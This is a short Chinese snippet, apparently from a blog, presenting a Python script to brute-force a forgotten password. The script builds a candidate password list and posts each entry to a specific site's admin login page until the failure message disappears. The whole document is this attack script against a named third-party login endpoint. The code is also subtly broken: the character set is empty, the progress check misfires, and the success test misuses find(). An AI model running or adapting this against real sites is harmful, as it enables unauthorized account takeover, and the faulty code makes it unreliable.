忘记秘密利用python模拟登录暴力破解秘密:
#encoding=utf-8 import itertools
import string
import requests def gen_pwd_file(file="pwd_file.txt"):
"""
生成候选密码文件,可以网上直接下载一个或自己直接写
"""
# words = string.digits+string.letters
words = ''
pwd_iter = itertools.product(words, repeat=6)
cnt = 1
with open(file, 'a') as fw:
for pwd in pwd_iter:
fw.write("".join(pwd)+'\n')
cnt += 1
if cnt%5000:
print cnt,'done'
if cnt>500000:
break def get_quaigo_pwd(login_url='http://www.quaigo.com/Admin/Public/login/login.php', username="test", pwd_file='pwd_file.txt'):
"""
模拟登录
"""
#请求的URL地址
LOGIN_URL = 'http://www.quaigo.com/Admin/Public/login/login.php'
#模拟登陆的浏览器
HEADERS = {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'}
cnt = 1
with open(pwd_file) as fr:
for line in fr:
pwd = line.strip()
DATA = {"username":username, "password": pwd} #登录系统的账号密码,也是我们请求数据
res = requests.post(LOGIN_URL, data=DATA, headers=HEADERS) #模拟登陆操作
print(cnt)
cnt += 1
if res.text.find(u"密码错误"):
print(res)
continue
else:
print(line)
break # 生成密码文件
gen_pwd_file() # 逐个密码尝试登录
get_quaigo_pwd(login_url='http://www.quaigo.com/Admin/Public/login/login.php')